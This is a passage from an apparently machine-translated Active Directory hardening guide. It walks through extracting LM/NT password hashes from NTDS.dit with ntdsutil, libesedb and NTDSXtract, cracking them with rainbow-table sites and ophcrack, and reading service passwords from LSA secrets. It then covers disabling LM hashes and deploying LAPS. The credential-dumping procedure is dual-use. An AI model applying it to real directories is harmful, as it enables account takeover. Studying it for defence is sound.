dBCSPwd and lmPwdHistory using tools LIBESEDB / NTDSXtract and use a website like
Security Target ( https://www.objectif-securite.ch/ ) That hosts online rainbow table to retrieve a user's password.

To generate the LM hash, the domain controller does the following:


1. The plain password is a DOS CHARSET size (14 characters).
2. The password is converted to uppercase.
3. The password is completed with characters null if it is less than 14 characters (14 bytes or 112 bits).

4. The result of this processing is divided into two blocks of 7 bytes (56 bits). For each 7 byte block (56 bits) is added all 7 bits, a 0 bit to obtain a
value of 64 bits (8 bytes) to be used as a DES encryption key.

5. Each of the two DES keys is used to encrypt the string " KGS! @ # $% ". The result (64 bits) of the two operations is concatenated to obtain a
value of 16 bytes (128 bits). This value is the LM hash.

To summarize : LM = DES (Password [0..6] KGS @ # $%!) | OF (Password [7..13], KGS! @ # $%)
The LM hash is very weakly secure because it does not handle the case (uppercase / lowercase), supports passwords of less than 15
characters, does not include salt and uses encryption keys DES 64-bit ( which 8 bits are 0). If the password is less than 8 characters, like all the
bits of the second DES keys are 0, a known hash value is obtained ( 0xAAD3B435B51404EE). 5 These weaknesses can generate a rainbow sky
table ( Rainbow Table) 17 GB (instead of 310 TB with the algorithm Philippe OECHSLIN) containing for each possible password the value of LMHash
corresponding. Since Windows 2008 R1, domain controllers no longer generate a default footprint LMHash format when the password is
updated. Many directory under Windows 2012 R2 still have LMHash footprint in the database because the password of some service
accounts has never been changed since sometimes 10 years or more!

3.10.3 THE NTHASH (NT L AN M ANAGER H ASH)

The NTHASH is stored at the attribute UnicodePwd. The history of passwords is stored at the attribute ntPwdHistory. These two attributes are
protected by the operating system against read access (including a Member user group Domain Admins).

The NTHASH is an imprint / Hash password which is based on the Hash function MD4 (without salt). For the NTHASH, the system performs
these actions:
• The password is encoded in Unicode format and can contain up to 255 characters.
• MD4 protocol is applied to obtain the NTHASH
To sum up : NTLM HASH (NTHASH) = MD4 (Password Unicode)

We will see in the next paragraph it is possible to recover the contents of the attributes
UnicodePwd and ntPwdHistory using tools LIBESEDB / NTDSXtract and therefore recover the password in the clear with Rainbow Table
(depending on the complexity of passwords). The NTHASH does not suffer the same design flaws that LMHash. Although HASH algorithm does
not include salt / seed, the rainbow table for NTHASH not generally allow that to recover passwords up to 16 characters conditional (dictionary
word ...) and 8

Msreport - Guillaume MATHIEU - All rights reserved


characters unconditionally. So we can say that a password stored as NTHASH
is relatively safe if it meets all the following conditions:
• The password is composed of different types of characters (lowercase, uppercase, special characters, numbers).

• The password is not based solely on a password dictionary and / or a sequence of numbers. The password Vachette1 is in all rainbow
tables MD4 / NTHASH.
• The password must have 10 characters for standard users, 16 for VIP and 24 for service accounts.

For more information :


https://www.sstic.org/media/SSTIC2007/SSTIC-
acts / Secrets_d_authentification_sous_Windows /
SSTIC2007-ArticleSecrets_d_authentification_sous_Windows-bordes.pdf

Msreport - Guillaume MATHIEU - All rights reserved


3.11 RECOVER PASSWORD USER WITH LMHash

3.11.1 L A PROCEDURE

We will see in the next section how to create a copy of the directory and mount it as a simple LDAP database with the tool LIBESEDB. The tool NTDSXtract
will extract the value attributes UnicodePwd, ntPwdHistory, dBCSPwd and lmPwdHistory.

3.11.1.1 Get the Ntds.dit file and SYSTEM

To use the tool LIBESEDB, we need to get the file NTDS.DIT ​( Active Directory database) and the SYSTEM file (the hive file that contains
registry entries in
HKEY_LOCAL_MACHINE \ SYSTEM). For this you can create a MFI (promoting a domain controller with media), a snapshot of the Active
Directory or use a backup of the system state (restore to a different location).

To generate an MFI:
You must have a domain controller in Windows 2008 R1 ( or later). Log in with a user account member of the Domain Admins group, and
type the following commands:

Ntdsutil
Activate instance ntds Ifm

Create full c: \ ifm

To save the system states:


You can use NTBACKUP with Windows 2003 domain controllers or Windows Server Backup with Windows 2008 (and later).

3.11.1.2 install a Linux

Install a virtual machine Kali ( https://www.kali.org ) Under VMware Workstation 10 (in this example) connected to the corporate network. You
can also use VMware ESXi, Hyper-V or
VirtualBox.
then install VMware Tools. You need to install Linux and Headers Autoconf.
apt-get install autoconf
apt-get install linux-headers - $ (uname -r)
In the menu VM click on Install VMware Tools. This will load the ISO VMware Tools in the DVD drive of the virtual machine.

Copy VMTools file in a working directory


PC /media/cdrom/VMwareTools-9.6.1-1378637.tar.gz /root/VMwareTools-9.6.1-1378637.tar.gz
Positioning in the directory
cd / root /
Unzip the file VMTools
tar xzf /root/VMwareTools-9.6.1-1378637.tar.gz
Positioning in the VMware Tools directory.
cd / root / vmware-tools-distrib
Start the script:
. /vmware-install.pl
Reply default questions (key Entrance of the keyboard).
VMware Tools must be installed and the virtual DVD drive automatically disassembles. To restart.

It is not necessary to install GCC because it is already installed on Kali.

3.11.1.3 Download and install LIBESEDB

LIBESEDB to mount an ESE database (Extensible Storage Engine). Remember, Active Directory is an ESA basis. Download LIBESEDB at this
address : https://github.com/libyal/libesedb/releases

Within this article, we download the file libesedb-experimental-20141110

Msreport - Guillaume MATHIEU - All rights reserved


Log on to the server Kali. Go to Applications | Accessories and then Terminal Administrator. Go to the directory with the TAR file and extract it
with the following command:
tar -xvf libesedb-experimental-20141110.tar.gz
Go to the LIBESEDB directory (/ root / libesedb-20141110). Start configuration sources.
. / configure
Then compile the program by typing the following command:
Make
Once the compilation is complete, type the following command to install the application:
make install
It is necessary to register the library libesedb.so.1. Otherwise, the error message below appears.

esedbexport: error while loading shared libraries: libesedb.so.1: can not open shared object file: No such file or directory

To register the DLL, type the command:


ldconfig

For more information : https://github.com/libyal/libesedb/wiki/Building

3.11.1.4 Download and install NTDSXtract

Download NTDSXtract at the following address:


http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
Extract NTDSXTRACT in / root / NTDSXtract 1.0 with the following command:
unzip /root/ntdsxtract_v1_0.zip
mv / root / NTDSXtract \ 1.0 / / root / NTDSXTRACT

3.11.1.5 Recovery LMHash

Copy the folder c: \ ifm in / root / NTDSXtract. Go to the directory LIBESEDB.


cd / root / libesedb-20141110 /
. / Esedbexport /root/libesedb-20141110/ntds.dit

The command should return this result:


Opening file.
Exporting table 1 (MSysObjects) out of 11. Exporting table 2
(MSysObjectsShadow) out of 11. Exporting table 3
(MSysUnicodeFixupVer2) out of 11. Exporting table 4 (datatable) exporting
out of 11. Table 5 (hiddentable) out of 11. Exporting table 6 (link_table) out
of 11.

Exporting table 7 (quota_rebuild_progress_table) out of 11. Exporting table 8


(quota_table) exporting out of 11. Table 9 (sdpropcounttable) exporting out of 11.
Table 10 (sdproptable) exporting out of 11. Table 11 (sd_table) out of 11. Export
completed.

The command esedbexport /ntds.dit.export generates a directory in the file esedbtools with the following files:

2767300 rw-r - r-- 1 root root 19 Jan 5:00 p.m. 9,616,462 2,767,301 datatable.3 rw-r -. R-- 1
root root 693 Jan. 19 5:00 p.m. hiddentable.4
2767302 rw-r - r-- 1 root root 6563 Nov 19 5:00 p.m. link_table.5 2767297 rw-r -.. R-- 1 root root 75441 Jan
19 5:00 p.m. MSysObjects.0 2,767,298 -rw- r - r-- 1 root root 75441 Jan 19 5:00 p.m.
MSysObjectsShadow.1 2767299 rw-r -. r-- 1 root root
103 Jan. 19 5:00 p.m. MSysUnicodeFixupVer2.2
2767303 rw-r - r-- 1 root root 80 Jan. 19 5:00 p.m. quota_rebuild_progress_table.6
2767304 rw-r - r-- 1 root root 638 Jan. 19 5:00 p.m. quota_table.7
2767305 rw-r - r-- 1 root root 14 Jan. 19 5:00 p.m. sdpropcounttable.8
2767306 rw-r - r-- 1 root root 96 Jan. 19 5:00 p.m. sdproptable.9
2768102 rw-r - r-- 1 root root 29626 Jan 19 5:00 p.m. sd_table.10.

Msreport - Guillaume MATHIEU - All rights reserved


NTDSXTRACT.
We will now use the tool to retrieve the NTDSXtract LMHash. Type the following command:

PC /root/libesedb-20141110/ntds.dit.export/datatable.3 /root/NTDSXTRACT/datatable.3 PC
/root/libesedb-20141110/ntds.dit.export/link_table.5 /root/NTDSXTRACT/link_table.5 cd / root / NTDSXTRACT

python ./dsusers.py datatable.3 link_table.5 --passwordhashes SYSTEM

The command returns this result:


Running with options: Extracting
password hashes Initialising engine ...

Scanning database - 100% -> 3717 records processed Searching for Schema object - 100%
-> 12 records processed Extracting information scheme - 100% -> 1549 records processed
Extracting object links ... List of users: ========= ===== Record ID:

5768
User name: Guillaume Mathieu
User principal name: guillaume.mathieu@tphat.intra SAM Account name:
guillaume.mathieu
SAM Account Type: SAM_NORMAL_USER_ACCOUNT GUID:
1eaee5d6-5f8f-4e8c-a840-31caddad6755 SID:
S-1-5-21-2163606747-459301225-4249714960-1121 When created:
2013-08-05 8:12:08
When changed: 2013-08-17 6:20:58 p.m.
Account expires: Never
Password last set: 2013-08-17 18: 20: 58.095203 Last logon:
2013-08-15 12: 30: 01.708144
Last logon timestamp: 2013-08-12 18: 41: 32.890748 Bad time password
2013-08-15 12: 29: 32.988494 Logon count:
18
Bad password count: 0 User
Account Control:
NORMAL_ACCOUNT PWD Never
Expires Ancestors:

$ $ ROOT_OBJECT intra tphat Users Guillaume Mathieu Password hashes:

Guillaume Mathieu: $ NT $ 13b29964cc2480b4ef454c59562e675c ::: Guillaume Mathieu


11cb3f697332ae4c4a3b108f3fa6cb6d :::

With this command we even history passwords LMHash size:


python ./dsusers.py datatable.3 link_table.5 --passwordhashes --passwordhistory SYSTEM SYSTEM

The result below:


Record ID: 5768
User name: Guillaume Mathieu
User principal name: guillaume.mathieu@tphat.intra SAM Account name:
guillaume.mathieu
SAM Account Type: SAM_NORMAL_USER_ACCOUNT GUID:
1eaee5d6-5f8f-4e8c-a840-31caddad6755 SID:
S-1-5-21-2163606747-459301225-4249714960-1121 When created:
2013-08-05 8:12:08
When changed: 2013-08-17 6:20:58 p.m.
Account expires: Never
Password last set: 2013-08-17 18: 20: 58.095203

Msreport - Guillaume MATHIEU - All rights reserved Copy the SYSTEM file in the / root /
Last logon: 2013-08-15 12: 30: 01.708144
Last logon timestamp: 2013-08-12 18: 41: 32.890748 Bad time password
2013-08-15 12: 29: 32.988494 Logon count:
18
Bad password count: 0 User
Account Control:
NORMAL_ACCOUNT PWD
Never Expires Ancestors:

$ $ ROOT_OBJECT intra tphat Users Guillaume Mathieu


Password hashes:
Guillaume Mathieu: $ NT $ 13b29964cc2480b4ef454c59562e675c ::: Guillaume Mathieu
11cb3f697332ae4c4a3b108f3fa6cb6d ::: Password history:

William Mathieu_nthistory0: $ NT $ 13b29964cc2480b4ef454c59562e675c ::: William Mathieu_nthistory1: $


NT $ 13b29964cc2480b4ef454c59562e675c ::: William Mathieu_nthistory2: $ NT $
13b29964cc2480b4ef454c59562e675c ::: William Mathieu_nthistory3: $ NT $
13b29964cc2480b4ef454c59562e675c ::: William Mathieu_lmhistory0:
11cb3f697332ae4c4a3b108f3fa6cb6d ::: William Mathieu_lmhistory1: 11cb3f697332ae4c4a3b108f3fa6cb6d
::: William Mathieu_lmhistory2: 99d1842dae7bad31a5615a0b1741a415 ::: William Mathieu_lmhistory3:
ce2f42bb6280ebf4b01331c7e77ec962 :::

In the example below, we have several times the same password because the administrator has reset the password from the console Active
Directory Users and Computers.

3.11.1.6 Converting password LMHash

Log on the objective Site security and enter the LMHash ( http: //www.objectif-
securite.ch/ophcrack.php).
In the case of guillaume.mathieu account, there are two lines Password Hashes:
Password hashes:
Guillaume Mathieu: $ NT $ 13b29964cc2480b4ef454c59562e675c ::: Guillaume Mathieu
11cb3f697332ae4c4a3b108f3fa6cb6d :::
The line with $ NT $ 1 corresponds to NTHASH. The second line
is the LM hash.

Copy LMHash this form (11cb3f697332ae4c4a3b108f3fa6cb6d) at:


http://www.objectif-securite.ch/ophcrack.php

the password is found in upper case. The application website uses NTHASH to determine the characters to uppercase.

The tool also allows Lm2ntcrack.exe recover the password with uppercase and lowercase. For this type the following command:

Lm2ntcrack.exe -l = "UPPERCASE_PASSWORD" -n = "NTHASH"


http://www.xmco.fr/lm2ntcrack/lm2ntcrack-current_win32.zip

3.11.2 C OW DISABLE LMHash

Now that we have understood the dangers of LMHash, we will see:


• Prerequisites to disable LMHash.
• How to disable LMHash.

3.11.2.1 What are the potential impacts?

Before disabling the LM hash, check the following:


• You do not have machines running Windows 95/98 or Windows NT4 (prior to SP3).
• You do not have SAMBA servers prior to version 3.
• You do not have clustered Windows 2000 or Windows 2003.

Msreport - Guillaume MATHIEU - All rights reserved


• No Apple machine running Outlook 2001 in Exchange mode. For Windows 2003 clusters (MSCS):
There is a patch (KB 890761).
For Windows 2000 clusters: you must be minimum SP3 (KB 272129). The KB 828861 suggests that it is mandatory under Windows 2000
Server set the password of the cluster service with at least 15 characters if LMHash disabled. I invite you to read these articles:

http://support.microsoft.com/kb/272129/en-us
http://support.microsoft.com/kb/299656/en-us
http://support.microsoft.com/kb/828861/en- us
http://support.microsoft.com/kb/890761/en-us
http://support.microsoft.com/kb/895092/en-us
http://www.markwilson.co.uk/blog/2004/06/problems-with-microsoft-clusters.htm
http://blogs.technet.com/b/askcore/archive/2011/08/11/windows -2003-server-cluster-and-accessdenied-errors.aspx

3.11.2.2 deactivation Procedure LMHash

To disable LMHash, you can apply one of two methods:

Method 1: Change all passwords


Enable GPO Network security: Do not store LAN Manager hash value on next password change.
Start gpmc.msc console. Edit Default Domain Controller Policy.
Go in Computer Configuration | Policies | Windows Settings | Security Settings. Configure the setting Do not store LAN Manager hash value on
next password change at Enabled.
Do the same action at the GPO Default Domain Policy.
Change the password for all users and computer accounts. You can force users to change their password by checking the box User must
change password at next logon.

You can reset with the same password value all service accounts. The password of a computer account changes every 30 days so I suggest
you wait. These two actions will remove the attribute value dBCSPwd.

To remove the attribute values lmPwdHistory ( Historical passwords in LM hash format) will require changing passwords a number of times
corresponding to the historical passwords. This does not cause problems with service accounts because you know their password. For user
accounts I offer you the following trick: Reset all user accounts with default passwords. Communicating this new password to users by checking
the box User must change password at next logon at the user account. The user thus change their password at next logon.

A less ethical method is to recover all passwords with the procedure of the preceding paragraph and reset with the same value. Then check the
box User must change password at next logon to lose the knowledge of the password for all users.

Method 2: Use of passwords longer than 15 characters


Enable GPO Network security: Do not store LAN Manager hash value on next password change.
Start gpmc.msc console. Edit Default Domain Controller Policy. Go in Computer Configuration | Policies | Windows Settings | Security Settings. Configure
the setting Do not store LAN Manager hash value on next password change at Enabled.

Msreport - Guillaume MATHIEU - All rights reserved


Domain Policy.
Set a password greater than 15 characters for all user accounts. For computer accounts, the system will change after 30 days. These two
actions will remove the attribute value dBCSPwd.

To remove the attribute values lmPwdHistory, we must change the password a number of times corresponding to the historical passwords.

The LM hash is disabled by default on Windows 2008 domain controllers (the default setting when the GPO Network security: Do not store LAN
Manager hash value on next password change is not set / configured. This information is important for Windows migration projects 2000/2003 to
Windows 2008 R1 and later. For more information :

http://support.microsoft.com/kb/299656/en-us
http://support.microsoft.com/kb/946405/en-us

3.12 RECOVER PASSWORD USER WITH NTHASH

3.12.1 L A PROCEDURE

The principle is exactly the same as the LMHash. We must use the tools LIBESEDB and
NTDSXtract NTHASH to recover.
The tool NTDSXtract had generated the following line with the NTHASH account Guillaume MATHIEU.
Guillaume Mathieu: $ NT $ 13b29964cc2480b4ef454c59562e675c :::
Take only the string after $ NT $ 3 characters and remove ":" either:
13b29964cc2480b4ef454c59562e675c
Copy this value to the web site that includes a rainbow table as MD4:
https://crackstation.net .
http://www.onlinehashcrack.com/
http://www.onlinehashcrack.com/

The password is displayed in plain text: P @ ssword .


You can also use a tool such as Ophcrack ( http://ophcrack.sourceforge.net ) And install it on a machine that has 2 TB of disk space. The tool is
based on a set of tables, some of which are provided for free and others are paid. If you only use the free tables, you need to 5.02 GB of free
space.

Msreport - Guillaume MATHIEU - All rights reserved Do the same action at the GPO Default
A video presentation of ophcrack st available at:
https://www.youtube.com/watch?v=x4WfTdlmwyY

Installation is very simple and automatically downloads 4 tables ( Free Vista, Vista probabilistic free, XP and XP Free free Small). You have to
manually download the table Vista num at this address
http://ophcrack.sourceforge.net/tables.php . The tables XP Free and XP free small help break the LMHash. We therefore will disable.

We will now see how to test this tool. Login to the website https://defuse.ca/checksums.htm . Enter the password 14127487. Copy the value of
NTHASH obtained: b8895eced52341edfc6a078bb962cb3b .

Go to the menu Load | Single hash. The input format is LMHash: NTHASH. It is assumed that LMHash is disabled (so that the field is empty). So
enter the following value:
: b8895eced52341edfc6a078bb962cb3b

Then click on the button Crack. We find the password in less than 5 seconds. There are other free or paid tools such as:

http://project-rainbowcrack.com (1000 dollars).


https://www.freerainbowtables.com (free)

Msreport - Guillaume MATHIEU - All rights reserved


Msreport - Guillaume MATHIEU - All rights reserved
3.12.2 C OW TO PROTECT PASSWORD

The NTHASH MD4 is a fingerprint password format Unicode without salt. Although this method HASH be much less effective than the SHA1 ( or
other more modern functions), the NTHASH does not suffer the same design flaws that LMHash. The rainbow table

MD4 available on the Internet (free or paid) generally allow to recover the password from NTHASH for passwords less than 9/10 and characters
up to 16 characters Conditional. To ensure the security of your passwords, it is necessary to adopt the following password policy:

• The minimum length of the password: 10 characters for standard users, 16 characters for sensitive users (VIP accounts with
administrative privileges) and 24 characters for service accounts.

• Complexity of passwords: activated


• History passwords: enabled (5 memorized passwords).
• Maximum lifetime of the password: 90 days

The adoption of a tool like Hitachi ID Password Manager can help block the passwords with a dictionary word as Vachette1 ( which is available in
all rainbow tables). A good practice is to test the strength of the password sensitive accounts by checking that they are not in the rainbow
tables. Generate why the NTHASH from this website

https://defuse.ca/checksums.htm and install ophcrack to try to find the password from the resulting NTHASH.

You must also prevent an attacker to obtain the file NTDS.DIT and SYSTEM one of your domain controllers (read / write). Both files can be
obtained via a backup directory, a IFM (Install From Media) flying a physical domain controller or by copying a virtual domain controller
(snaphsot). You can encrypt your disk read-only domain controllers / write BitLocker. If the disk is encrypted, an attacker can not view the
contents of the disk with tools like a LiveCD.

You can deploy RODC ( read-only domain controller) on sites that do not have a secure computer room. The RODC does not contain passwords
for user accounts / computers (except for accounts defined exception).

You must enhance the security of your directory to prevent an attacker gets administrative privileges on the directory as Administrators, Domain
Admins, Enterprise Admins. He could then make a backup of the directory or generate a IFM.

Msreport - Guillaume MATHIEU - All rights reserved


3.13 PROTECTING STORED PASSWORD ON WINDOWS MACHINES

3.13.1 L ES SERVICES AND TASKS PLANNED

Many passwords are also present on the machines of domain other than the domain controllers. In the example below the service VMware Tools was
configured with the account guillaume.mathieu domain msreport.be. This account is a member of Domain Admins.

The password for the account used by a service or scheduled task is stored in the registry key Hkey_Local_Machine \ Security \ Policy \
Secrets. You can access this key by connecting with an administrator account on the machine and manually setting permissions on Hkey_Local_Machine
\ Security.

If we develop the key secrets we can see that there is a key under to the VMware Tools service called _ SC_VMTools. This key
contains in turn 5 key

Msreport - Guillaume MATHIEU - All rights reserved


• CupdTime: date of last change password
• CurrVal: the value of the password for the account specified for this service (meaning the password guillaume.mathieu account that is
in our case group member Domain Admins).
• OLDVAL: the old value of the password for the service account VMware Tools.
• OupdTime: previous date when the service configuration has been updated.
• SecDesc: detailed permissions

When the service starts, password ( NTHASH and LMHash if enabled) is stored in the process memory Lsass.exe ( service Netlogon).

Tools like CAIN ( http://www.oxid.it/cain.html ) or NirLauncher ( http://launcher.nirsoft.net ) Can recover passwords by analyzing the process
memory Lsass.exe or by analyzing the contents of register entries in Hkey_Local_Machine \ Security \ Policy \ Secrets.

In this example, the password of the account guillaume.mathieu is P @ ssword.

3.13.2 L E COVER SESSIONS W INDOWS

How can you log on to a laptop when you are not connected to the corporate network and domain controllers are not available? Why do not you
the error message below?

You can authenticate the evening on your laptop with your domain user account because Windows caches your login / password on your laptop
in the Windows registry at the key HKEY_LOCAL_MACHINE \ SECURITY.

In Windows 2003, the password of the user cache ( MSCASH) is an MD4 hash of the user NTHASH concatenated to the user login is: MSCASH:
MD4 (MD4 (password) + username)

This protection is very vulnerable as explained in this article:


http://www.jedge.com/wordpress/windows-password-cache-mscache-mscash-v2/

In Windows 2008, this algorithm has evolved (known format MSCASH2). PKCS # 5 (MD4 (MD4 (password)
+ username))

Msreport - Guillaume MATHIEU - All rights reserved


more reliable.

I invite you to read the articles below and disable caching sessions on servers and fixed workstations. This feature can be turned on laptops
with Windows Vista and later.

http://www.securiteam.com/tools/5JP0I2KFPA.html
http://www.jedge.com/wordpress/windows-password-cache-mscache-mscash-v2/

Msreport - Guillaume MATHIEU - All rights reserved Protection is much


3.14 MANAGING YOUR LOCAL SAM BASIC MACHINE WITH MICROSOFT LAPS

It is important to set a different local administrator password on each machine company (servers and workstations). This can be done using the
Microsoft tool LAPS.

This solution is provided free by Microsoft and can be downloaded at the following address:
https://support.microsoft.com/en-us/kb/3062591 .

It replaces the solution provided by Microsoft through the Group Policy Preference which should no longer be used as a standard user can find
the password of the SAM database user account using the following procedure:

http://blogs.technet.com/b/askpfeplat/archive/2014/05/19/how-to-automate-changing-the-localadministrator-password.aspx

LAPS can automatically change the password of a local based administration account SAM on the domain member machines. A unique
password is generated for each machine and is stored in the attribute ms-Mcs-AdmPwd Account computer of the machine.

This attribute is said protected because it is necessary to have the right ExtendedRight in order to display the value of this attribute. Otherwise,
we see that empty attribute (for a standard user).

The solution on the client machines uses a DLL ( % ProgramFiles% \ LAPS \ SSC \ AdmPwd.dll )
extending Group Policy. The solution is based entirely on the engine group policies. The change of password is done when a machine applies
group policies (every 90 minutes + 0 to 30 minutes).

The solution manages the bultin administration account or another account. The solution allows to maintain a single user account of the
SAM database.

Once the solution is deployed, when a machine applies the GPO, it does the following:

• It checks if the password account administrator of the SAM database has expired by making a request on attribute ms-Mcs-AdmPwdExpirationTime
at his computer account.
• If the password has expired, it generates a new password for the administrator account of the local SAM database.

• She writes the value of the new password in the attribute ms-Mcs-AdmPwd and the expiration date of the new password in the attribute ms-Mcs-AdmPwdExpira
. The machine must therefore have the right to write the attribute but not to read the value of this attribute.

When the machine is offline, the solution does nothing because the CSE client detects that there is no connectivity with a domain controller. The
diagram below shows the view entire solution.

Computer account in AD

...

Admin password Pwd


Support staff
Expiration Time

...

active Directory

Managed Machine

GPO Framework
AdmPwd.dll
scecli.dll

.. .

Msreport - Guillaume MATHIEU - All rights reserved


The tool LAPS has a PowerShell module administration and a graphical interface to search for passwords.

It is necessary to connect on port 636 (LDAPS) or using native tools LAPS (which provide protection) when accessing a password stored in the
attribute ms-mcs-admpwd
a computer account. Otherwise, the password travels unencrypted over the network as any data.

http://www.cert.ssi.gouv.fr/site/CERTFR-2016-ACT-008/index.html
http://blogs.msdn.com/b/laps/archive/2015/06/01/laps-and-password-storage-in-clear-text-in-ad.aspx

Microsoft Premier customers can access a special version of Microsoft LAPS that supports the history management password of the local
administrator account (in a new attribute) that can store encrypted so the password in Active Directory.

The value of deploying Microsoft's solution to protect against attacks by privilege elevation is presented in the following video:

https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevation-deprivileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#f7GY1f7uVyK

Feedback on deploying Microsoft LAPS:


On workstations / domain member servers, you need only register the DLL
% Program Files% \ LAPS \ SSC \ AdmPwd.dll to add the Group Policy Client Side Extension of LAPS.

This can be done in 2 ways:


msiexec / i \\ server \ share \ LAPS.x64.msi / quiet regsvr32.exe
AdmPwd.dll

The tool LAPS has a PowerShell module administration and a graphical interface to search for passwords. Both tools require the deployment of
.Net Framework 4.0. It is recommended that deployed PowerShell V3 or the following procedure only if one has PowerShell V2 (Windows 2008
R2 default):

If one has PowerShell V2, you must make a change if it does not work. It works by default PowerShell v3.

We must create the file C: \ windows \ system32 \ WindowsPowerShell \ v1.0 \ powershell.exe.config to allow the compiled assembly for loading
.net Framework 4.0.
Sample glad of file below: <? Xml version
= "1.0"?>

Msreport - Guillaume MATHIEU - All rights reserved


<Configuration>
<Startup useLegacyV2RuntimeActivationPolicy = "true">
<SupportedRuntime version = "v4.0.30319" />
<supportedRuntime version = "v2.0.50727" /> </ startup> </
configuration>

LAPS requires updating the Active Directory schema. This action is via PowerShell module LAPS (screenshot below).

It is necessary to delegate to computer accounts allowed to read and write the attribute ms-McsAdmPwdExpirationTime and the right to write
only at the attribute ms-Mcs-AdmPwd.

This can be done for a specific OR with the command:


Set-AdmPwdComputerSelfPermission -OrgUnit <name of the OR to delegate permissions>

It is then necessary to delegate to the directors not members of groups with high privileges as Domain Admins the ability to read the attribute ms-Mcs-AdmPwd
. This is done through the following PowerShell command:

Set-AdmPwdReadPasswordPermission -OrgUnit <name of the OR to delegate permissions> AllowedPrincipals <users or groups>

The last step is to configure the GPO that is used to set the LAPS tool.

Msreport - Guillaume MATHIEU - All rights reserved


3.15 WORDS DEFINING A STRATEGY GOING TARGET

Once you evaluate your needs and you have an idea of ​the technical solutions to be implemented, you need to arrange meetings with the
company management, the teams responsible for resetting passwords and employee representatives . Nothing can be done without them or
against them.

For the perfect project to secure password management to validate your approach and will update if necessary the IT charter to describe the
potential penalties for non-compliance with safety rules for passwords (forbidden write it on a POST-IT ...). A user writes their password behind
his keyboard should be highly aware of the security risks. Union representatives must approve technical solutions implemented, the IT charter
and the measures taken against employees who violate the new safety rules.

The teams responsible for resetting the passwords must be associated with the implementation of such solutions PWM that allows a user to
reset his own password (without the intervention of the Helpdesk team) by answering his secret questions. This tool will indeed also the
Helpdesk teams to identify the applicant before resetting their password.

If some VIP users refuse to change their passwords, you may consider lowering the security settings of the Default Domain Policy ( minimum
standard) and implementing PSOs to other users (standard norm).

The security level of a system corresponds to the lowest security level of any of these items. It is preferable to implement a strategy of secure
passwords for 90 percent of users and low of 10 percent that will implement any strategy passwords. When 90 percent of users have switched,
you demonstrate that the solution is viable and you can convince 10 percent of recalcitrant users to apply security standards.

Avoid implementing a strategy too complex passwords with third party tools such as
Hitachi ID Password Manager. Users must succeed in changing password in 1 try applying basic instructions. Prohibit all common
dictionary words can be very counterproductive.

Avoid configure accounts with administrative privileges significant level of planned services or jobs on insecure machines and the Active
Directory team does not control.

Msreport - Guillaume MATHIEU - All rights reserved


4 ENHANCE SAFETY PROTOCOLS AUTHENTICATION
4.1 THE PROTOCOL LDAP

Active Directory is a directory LDAP. A user can use a tool like LDP.EXE to connect to a domain controller and
run commands LDAP as bind
(User authentication) Search ( Finding Objects) Add ( add a new object). Active Directory supports two methods for placing an order LDAP Bind:

• LDAP Simple Bind


• LDAP SASL Bind

4.1.1 LDAP S imple B IND

This method is to send the login and user password in clear text over the network to authenticate. Active Directory supports several types of
login in an LDAP query Simple Bind:
• The value of attribute distinguishedName ( example: CN = Guillaume Mathieu, OU = IT,
DC = msreport, DC = FR)
• The value of the attribute UserPrincipalName ( example: guillaume.mathieu@msreport.fr)
• The value of the attribute SamAccountName, with the @ character and the DNS domain name (example: gmathieu@msreport.fr)

• The value of the attribute SamAccountName, with the @ character and the UPN suffix (example:
gmathieu@msreport.fr)
• The NetBIOS name of the domain with the \ character and the value of SamAccountName
(Example: Msreport \ gmathieu)
• The canonical name of the object (example: msreport.fr/IT/Guillaume Mathieu)
• The value of the attribute ObjectGUID ( example: 43a1fa2b-9a8e-4d46-92e5-aca403197f3f)
• The value of the attribute displayName ( example: Guillaume MATHIEU)
• One of the attribute values ServicePrincipalName
• The value of the attribute ObjectSID (S-1-5-21-2479351881-651737401-1049745595-1105)
• One of the values ​of the SIDHistory attribute.

Active Directory supports SSL / TLS (LDAPs connection) to prevent an attacker to obtain the user's password in a LDAP Simple Bind.

BIND 4.1.2 LDAP SASL

SASL stands for Simple Authentication and Security Layer. This method allows to use protocols like Kerberos, NTLM V2, NTLM, or LM DIGEST
to authenticate to an LDAP server. It avoids sending the login / password in the clear over the network. SASL allows you to use 4 authentication
protocols presented in the table below.

protocols
Additional authentication information
GSS-SPNEGO Used to authenticate with the Kerberos protocol, LM, NTLM and NTLM V1 V2.
GSSAPI Used to authenticate with the Kerberos protocol, LM, NTLM and NTLM V1 V2.
EXTERNAL Used to authenticate with an external method such as a certificate.
DIGEST-MD5 Used to authenticate with the Digest-MD5

I invite you to read these articles before continuing:


http://fr.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://blogs.technet.com/b/askds/archive/2009/09/21/understanding-ldap-security-processing.aspx

Msreport - Guillaume MATHIEU - All rights reserved


4.2 PRESENTATION OF PROTOCOL NTLM V2

The NTLM V2 authentication protocol is still used and active in Microsoft Windows environments although the Kerberos authentication protocol
is more secure because:
1. Only NTLM allows users to authenticate to a resource when accessed via its IP address.
2. If an external trust relationship was established between two domains (in two separate forests) and your domain controllers are running
Windows 2003, only the NTLM protocol allows a domain user A to authenticate to a domain resource B (and vice versa). With Windows 2008
R2 domain controllers (and higher) it is now possible to make Kerberos with an external trust relationship. For more information, see

http://jorgequestforknowledge.wordpress.com/2011/09/14/kerberos-authentication-over-an-externaltrust-is-it-possible-part-6/

3. Only the NTLM protocol is supported when it authenticates with an account of the local SAM database to a Windows machine.

4. Only the NTLM protocol is supported by some systems (like Windows NT4) or applications.

We'll see how a client can access a C O server by authenticating with NTLM V2 protocol. The client C and the server S are both members of
the domain msreport.be.

There are 3 players to enable NTLM authentication:


• Client C: the user who wants to access the service (such as file sharing) of the server S.
• The server S: the machine that hosts the service (such as file sharing).
• The domain controller: it will allow to authenticate the client C and the server S.

The NTLM V2 Authentication Protocol is a stimulus / response mechanism that allows clients to authenticate (prove identity) without sending
their passwords in clear text over the network. The NTLM V2 protocol is an evolution of the LM and NTLM. We will see later in this document
that the LM and NTLM protocols (NTLM V1) must be disabled because they are much less secure than NTLM V2.

In our example, the client has not yet authenticated to the Active Directory domain controller. It is assumed that the LMHash disabled. NTLM V2
Authentication then requires 7 steps.

1. Client C logs on by entering their login and password. the DLL msgina.dll will transfer the login and user password process Lsass.exe ( NETLOGON
service).
2. The Windows client C generates a hash of the user's password (NTHASH). It clears from memory the password in clear entered by the user.
